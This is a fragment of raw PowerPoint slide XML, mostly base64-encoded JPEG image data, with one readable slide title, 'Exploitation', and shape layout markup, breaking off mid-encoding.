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9" descr="data:image/jpeg;base64,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6102E20-D9BA-486F-884A-43947276C7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2300" y="1714500"/>
            <a:ext cx="2806700" cy="341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4640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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQPEBQPDxAUFBQPEBQQDxUVFRcPFBAQFRgZFBQVFBQXHCgeGBklGhQUIC8gIycpLS0tFR4yNTArNSYrLSkBCQoKDAwOFA4PFDUkHiM1NSkwLSk1LDUuNSw1KTUpNTU2KSs1KSk1Ly8pNTUpKjUpKSstNiw1LCkrNS4sLDIpNf/AABEIALAA6wMBIgACEQEDEQH/xAAcAAACAgMBAQAAAAAAAAAAAAAACAECBQYHAwT/xABMEAABAwICBQULCAgDCQAAAAABAAIDBBEFEgYHITFxEyJBdLMINDVRYXJzgZGxshQXIyUyM1XSFVJTYnWSoeFCQ/BERVRjgqLC0eP/xAAYAQEAAwEAAAAAAAAAAAAAAAAAAQUGBP/EACYRAQAABAUEAgMAAAAAAAAAAAABBAYRQkSBgsECAxITBTEhQVH/2gAMAwEAAhEDEQA/AO4oQhAIQhAIQhAIQhBCpLuV1WTceCgcv+ea/wDsW8ft/wD5LqLdyWNnRwCZ0Ljle719zy8otN8/8fLSfp9HTa97/mMfq39uFKhSu1mQhCEAhCEAhCEAhCEAhCEAoJUrzmbcEA22GxG8bN4QXzKMy1DCYJHVNYx1XUFtJLE2IF7Tma+lY5wdzdvOeXX8dujYsJV6UVAwqaPlyK2lhD5JbDM6HI2WOYNItzw5rN32g8b2oOl3UrzjFha/9/7r0QCEI